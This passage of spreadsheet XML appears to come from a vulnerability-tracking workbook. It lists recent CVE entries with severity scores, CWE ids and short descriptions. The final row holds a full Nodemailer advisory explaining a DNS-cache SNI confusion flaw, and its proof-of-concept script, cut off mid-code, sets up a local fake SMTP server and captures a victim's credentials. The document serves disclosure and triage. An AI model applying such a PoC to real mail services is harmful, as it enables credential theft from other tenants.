          <t>A security flaw has been discovered in DeepSeek deepseek-harness up to 0.1.7-rc.2. The affected element is the function loadProfile of the file packages/boot/app-boot/src/profile.ts of the component Bundle Patch Handler. The manipulation of the argument dsh.bundle.patch results in path traversal. The attack may be performed from remote. The attack requires a high level of complexity. The exploitability is described as difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101132</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101265</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-540</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Intelbras TIP 125i 4.3.35/4.3.41. The affected element is an unknown function of the component Básico Page. Such manipulation leads to inclusion of sensitive information in source code. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is described as difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101265</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102279</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>Laravel is a web application framework. Prior to 12.69.0 and 13.30.0, Laravel exception debug pages with APP_DEBUG=true pass attacker-controlled input to a Tippy.js tooltip configured with allowHTML true, enabling DOM-based cross-site scripting when a user hovers over the tooltip. This issue is fixed in versions 12.69.0 and 13.30.0.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102279</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101079</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>2.8</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-807</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in agentverus agentverus-scanner up to 0.8.1. Affected by this vulnerability is the function isSecurityDefenseSkill of the file dist/scanner/analyzers/context.js. Performing a manipulation results in reliance on untrusted inputs in a security decision. The attack must be initiated from a local position. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101079</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102241</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-320, CWE-321</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Netcore NAP930 0.1.241010.141410. This vulnerability affects unknown code of the file /lib/functions/backup_common.sh of the component Backup/Restore. This manipulation of the argument aes_pass causes use of hard-coded cryptographic key
 . It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102241</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101071</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Acrel Electric Unet Web Service up to 20260814. This vulnerability affects unknown code of the file /exchange/attachment/upload of the component Upload Endpoint. This manipulation of the argument File causes unrestricted upload. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101071</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101010</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in aaPanel BaoTa up to 11.8.0. The impacted element is the function getData of the file /www/server/panel/class/data.py. The manipulation of the argument log_type leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101010</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101011</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in aaPanel BaoTa up to 11.8.0. This affects the function get_domain_status of the file /www/server/panel/mod/project/domain/domainMod.py of the component Domain Handler. The manipulation of the argument get results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101011</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101139</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Webkul Bagisto up to 2.4.6. This impacts an unknown function of the file /admin/sales/invoices/mass-update/state of the component Invoice Mass Status Update. Performing a manipulation results in missing authorization. The attack can be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101139</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101036</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in FLB-Music FLB-Music-Player 1.1.8/1.1.9/1.2.0/1.2.1. This impacts the function path.join of the file /src/main/core/createParsedTrack.ts. The manipulation leads to path traversal. The attack must be carried out locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101036</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101078</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-653</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in deepseek-ai deepseek-harness up to 0.1.7-rc.2. Affected is an unknown function of the file packages/sandbox/sandbox-local/src/profiles.ts of the component Landlock Backend. Such manipulation leads to improper isolation or compartmentalization. The attack must be carried out locally. The exploit has been disclosed to the public and may be used. It is advisable to implement a patch to correct this issue. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101078</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101080</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>0.9</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="inlineStr"/>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Tencent AI-Infra-Guard up to 4.5.2/4.6.2. This affects the function startsWith of the file skill_scan/tools/dir/dir_actions.py of the component File Access. The manipulation leads to path traversal. The attack needs to be performed locally. The exploit is publicly available and might be used. Upgrading to version 4.6.0 is able to mitigate this issue. The identifier of the patch is ac0384edc9dbea3b226edefcf50613bd8509134f. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101080</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100701</t>
        </is>
      </c>
      <c r="D314" s="5" t="inlineStr"/>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M314" s="5" t="inlineStr">
        <is>
          <t>10.0.2</t>
        </is>
      </c>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr"/>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>### Summary
Nodemailer's process-global DNS cache is keyed only by `host`, but each cache entry also stores the caller-specific TLS `servername`. When two direct SMTPS transports use the same DNS host with different `tls.servername` values, the first transport's server name is returned to the second transport and overwrites its explicitly configured value.
As a result, Nodemailer sends the wrong SNI value and verifies the peer certificate against the wrong identity. In a multi-tenant service or SNI-routed SMTP gateway, one tenant can prime the cache so that a victim transport connects to the attacker's TLS virtual host, accepts the attacker's certificate with `rejectUnauthorized: true`, and sends the victim's SMTP credentials to it.
## Affected component
- **Ecosystem:** npm
- **Package:** `nodemailer`
- **Repository:** https://github.com/nodemailer/nodemailer
- **Tested version:** `10.0.1`
- **Tested commit:** `40d52215aac65b811d7e131bc916f68605efd9d2`
- **Runtime-confirmed vulnerable versions:** `5.0.0` and `10.0.1`
- **Affected versions:** `&gt;= 5.0.0, &lt;= 10.0.1`
- **Patched versions:** None known at the time of this report
- **Affected mode:** Direct TLS/SMTPS connections (`secure: true`) where different transports use the same non-IP `host` and different TLS `servername` values
The vulnerable cache implementation was introduced in commit `6859b5dd96c8d9f0070a3169a877181b71df4a3b` on 2018-12-28. Git history shows `v5.0.0` as the first release tag containing that commit. The behavior remains present in `v10.0.1`.
## Details
### Root cause
`src/shared/index.ts` defines one module-global DNS cache, keyed only by the DNS host:
```ts
export const dnsCache = new Map&lt;string, DnsCacheEntry&gt;();
```
Although the cache key contains only `host`, the cached value contains both DNS addresses and the request-specific TLS identity:
```ts
const value: DnsCacheValue = {
    addresses: allAddresses,
    servername: options.servername || host
};
dnsCache.set(host, {
    value,
    expires: Date.now() + (options.dnsTtl || DNS_TTL)
});
```
On a cache hit, `resolveHostname()` returns the cached `servername` without considering the current call's `options.servername`:
```ts
if (!cached.expires || cached.expires &gt;= now) {
    return callback(
        null,
        formatDNSValue(cached.value, {
            cached: true
        })
    );
}
```
`formatDNSValue()` copies that stale value into the result:
```ts
return Object.assign(
    {
        servername: value.servername,
        host,
        _addresses: addresses
    },
    extra || {}
);
```
For a direct TLS connection, `SMTPConnection.connect()` initially copies the current transport's TLS configuration into `opts`. `_resolveAndConnect()` then overwrites every truthy field with the cached resolver result, including `opts.servername`:
```ts
Object.assign(opts, this.options.tls || {});
if (this.servername &amp;&amp; !opts.servername) {
    opts.servername = this.servername;
}
return this._resolveAndConnect(opts, resolved =&gt; {
    this._connectToHost(opts, this.secureConnection);
});
```
```ts
for (const key of Object.keys(resolved!)) {
    if (key.charAt(0) !== '_' &amp;&amp; (resolved as { [key: string]: any })[key]) {
        (opts as { [key: string]: any })[key] = (resolved as { [key: string]: any })[key];
    }
}
```
The resulting `opts` object is passed to `tls.connect()`. Node therefore sends the cached server name as SNI and verifies the certificate against that cached name, rather than against the server name explicitly configured for the current transport.
The default DNS cache TTL is five minutes:
```ts
const DNS_TTL = 5 * 60 * 1000;
```
### Code path
```text
Tenant A: createTransport({ host: H, secure: true,
                            tls: { servername: attackerName } })
  -&gt; SMTPConnection.connect()
  -&gt; _resolveAndConnect(opts)
  -&gt; shared.resolveHostname({ host: H, servername: attackerName })
  -&gt; dnsCache.set(H, { addresses, servername: attackerName })
Victim: createTransport({ host: H, secure: true,
                          tls: { servername: victimName } })
  -&gt; SMTPConnection.connect()
  -&gt; opts.servername = victimName
  -&gt; _resolveAndConnect(opts)
  -&gt; shared.resolveHostname({ host: H, servername: victimName })
  -&gt; dnsCache.get(H)
  -&gt; returns cached servername = attackerName
  -&gt; _resolveAndConnect overwrites opts.servername
  -&gt; tls.connect({ servername: attackerName })
  -&gt; attacker SNI virtual host and certificate are selected
  -&gt; AUTH transmits victim SMTP credentials
```
### Relevant source locations in the tested revision
- `src/shared/index.ts:184` — five-minute default cache TTL
- `src/shared/index.ts:245` — process-global cache keyed by host
- `src/shared/index.ts:247-262` — cached `servername` returned by `formatDNSValue()`
- `src/shared/index.ts:292-323` — host-only lookup and cache-hit return
- `src/shared/index.ts:350-359` — caller-specific `servername` stored in host-only cache
- `src/smtp-connection/index.ts:713-729` — direct TLS options and resolver call
- `src/smtp-connection/index.ts:741-763` — cached fields overwrite current connection options
## PoC
### Prerequisites
- Node.js 20 (tested with Node.js `20.20.2`)
- A checkout/build of Nodemailer `10.0.1`
- OpenSSL to generate the local test certificate
No external SMTP server or network access is required.
### 1. Generate a certificate for only `attacker.test`
Create `openssl.cnf`:
```ini
[req]
distinguished_name = dn
x509_extensions = ext
prompt = no
[dn]
CN = attacker.test
[ext]
subjectAltName = DNS:attacker.test
basicConstraints = critical,CA:TRUE
keyUsage = critical,digitalSignature,keyEncipherment,keyCertSign
extendedKeyUsage = serverAuth
```
Generate the certificate and private key:
```bash
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -keyout attacker-key.pem -out attacker-cert.pem -config openssl.cnf
```
### 2. Save the following as `poc-dns-cache-servername-confusion.mjs`
Adjust the two import paths if the PoC is not saved beside the repository checkout.
```js
import fs from 'node:fs';
import tls from 'node:tls';
import nodemailer from '../../nodemailer/dist/esm/nodemailer.js';
import * as shared from '../../nodemailer/dist/esm/shared/index.js';
const cert = fs.readFileSync(new URL('./tls-fixture/attacker-cert.pem', import.meta.url));
const key = fs.readFileSync(new URL('./tls-fixture/attacker-key.pem', import.meta.url));
const observedSni = [];
const observedAuth = [];
const server = tls.createServer({ key, cert }, socket =&gt; {
    observedSni.push(socket.servername);
    socket.write('220 attacker.test ESMTP\r\n');
    let input = '';
    socket.on('data', chunk =&gt; {
        input += chunk.toString();
        let end;
        while ((end = input.indexOf('\r\n')) &gt;= 0) {
            const line = input.slice(0, end);
            input = input.slice(end + 2);
            if (/^EHLO /i.test(line)) {
                socket.write('250-attacker.test\r\n250 AUTH PLAIN\r\n');
            } else if (/^AUTH /i.test(line)) {
                observedAuth.push(line);
                socket.write('235 2.7.0 Authentication successful\r\n');
            } else if (/^QUIT/i.test(line)) {
                socket.end('221 Bye\r\n');
            } else {
                socket.write('250 OK\r\n');
            }
        }
    });
});
await new Promise(resolve =&gt; server.listen(0, '127.0.0.1', resolve));
try {
    shared.dnsCache.clear();
    // Tenant A seeds the process-global cache for the shared DNS host.
    const attackerTransport = nodemailer.createTransport({
        host: 'localhost',
        port: server.address().port,
        secure: true,
        auth: { user: 'attacker@example.test', pass: 'attacker-secret' },
        tls: {
            ca: cert,
            servername: 'attacker.test',
            rejectUnauthorized: true
        }
    });
    await attackerTransport.verify();
    attackerTransport.close();
    // The victim explicitly configures a different TLS identity.
    const victimTransport = nodemailer.createTransport({
        host: 'localhost',
        port: server.address().port,
        secure: true,
        auth: { user: 'victim@example.test', pass: 'victim-secret' },
        tls: {
            ca: cert,
            servername: 'victim.test',
            rejectUnauthorized: true
        }
    });
    await victimTransport.verify();
    victimTransport.close();
    const decoded = observedAuth.map(line =&gt;
        line.startsWith('AUTH PLAIN ')
            ? Buffer.from(line.slice('AUTH PLAIN '.length), 'base64').toString()
            : null
    );
    console.log(JSON.stringify({
